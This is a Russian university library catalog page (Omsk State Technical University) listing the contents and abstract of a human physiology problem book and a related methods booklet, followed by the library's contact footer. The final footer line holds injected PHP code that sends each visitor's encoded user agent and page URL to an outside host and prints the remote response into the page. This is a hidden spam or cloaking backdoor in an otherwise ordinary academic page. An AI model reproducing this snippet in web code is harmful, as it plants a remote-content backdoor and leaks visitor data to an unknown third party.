  • Системы возбудимых тканей. - с.5
  • Движение и опора. - с.8
  • Регуляция физиологических функций. - с.9
  • Кровь. Сердечно-сосудистая система. - с.12
  • Дыхание. - с.14
  • Пищеварение. - с.15
  • Обмен веществ и энергии. - с.18
  • Терморегуляция. - с.19
  • Выделение. - с.20
  • Внутренняя секреция. - с.21
  • Сенсорные системы. - с.22
  • Высшая нервная деятельность. - с.25
  • Графические задачи. - с.28
  • Сравнительные и обобщающие задачи. - с.31
  • Регуляция деятельности организма. - с.31
  • Нервная система. - с.35
  • Кровь. - с.45
  • Кровообращение. - с.50
  • Дыхание. - с.52
  • Пищеварение. - с.55
  • Обмен веществ. - с.57
  • Выделение. - с.63
  • Кроссворды. - с.65
  • Библиографический список. - с.82
Держатели документа (Информация об экземплярах) 

Сборник содержит задачи, составленные в соответствии с курсом "Физиология человека". Издание призвано помочь студентам не просто запоминать факты, а понимать сущность многих явлений. Цель данного сборника задач - не только максимально стимулировать самостоятельную работу студентов при изучении курса физиологии человека, но и привить им навыки чтения, обработки и расшифровки материалов, научить анализировать факты и т. д.

Полный текст
20. 
Оценка физического развития человека. Показатели сердечно-сосудистой системы [Текст] : метод. указания к практ. работе по курсу "Основы физиологии" / ОмГТУ, 2000. - 8 с.
Держатели документа (Информация об экземплярах) 
Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.32 с.12 запросов, 0.52c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;